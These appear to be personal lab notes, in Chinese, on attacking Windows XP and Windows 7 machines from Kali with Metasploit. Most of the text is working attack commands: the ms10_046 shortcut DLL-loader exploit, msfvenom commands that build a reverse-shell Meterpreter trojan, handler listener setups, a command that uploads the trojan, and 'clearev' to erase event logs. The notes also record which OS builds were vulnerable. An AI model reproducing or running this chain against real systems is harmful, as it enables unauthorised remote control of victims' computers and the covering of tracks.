Windows XP Professional with Service Pack 3 (x86) - CD  2008-05-01  这个版本测试通过
win7   还没测试

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
set SRVHOST 192.168.55.201   kali  的 ip 地址
run
运行后生成 http://192.168.55.201/

在 xp 下打开这个链接  会跳转到 \\192.168.55.201\NCqMi\     有个快捷方式 跟dll
一会  kali 下面  就会提示成功 

meterpreter > upload /home/kali/openme.exe c:\
这条命令可以上传木马 
木马的生成过程    msfvenom -p windows/meterpreter/reverse_tcp Lhost=192.168.55.201 lport=50000 -f exe -o openme.exe
chmod 777 openme.exe 可能是多余的 

退出当前  meterpreter

可以用木马连接了


打开监听
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp     xp是   x86 32位的
set lhost 192.168.55.201                 kali  ip 地址
set lport 50000                          
run

之后 xp 运行 openme.exe  就可以自动连上 
meterpreter > clearev    清除日志


有机会试试win7 64位  貌似要提权

cn_windows_7_professional_with_sp1_vl_build_x64_dvd_u_677816.iso 2011-05-12  win7打开连接失败
明天换2010年前的windows7 32 位 跟64位 试试

cn_windows_7_professional_x64_dvd_x15-65791.iso   2009-08-26
打开链接无法激活shell  无法继续实验

cn_windows_7_professional_x86_dvd_x15-65790.iso   2009-08-23




yaokong win8    msfvenom  -p windows/x64/meterpreter/reverse_tcp  LHOST=192.168.10.201  LPORT=50000  -f exe  -o openme.exe
use exploit/multi/handler 
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.55.201                 kali  ip 地址
set lport 50000                          
run
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp     xp是   x86 32位的
set lhost 192.168.55.201                 kali  ip 地址
set lport 50000                          
run
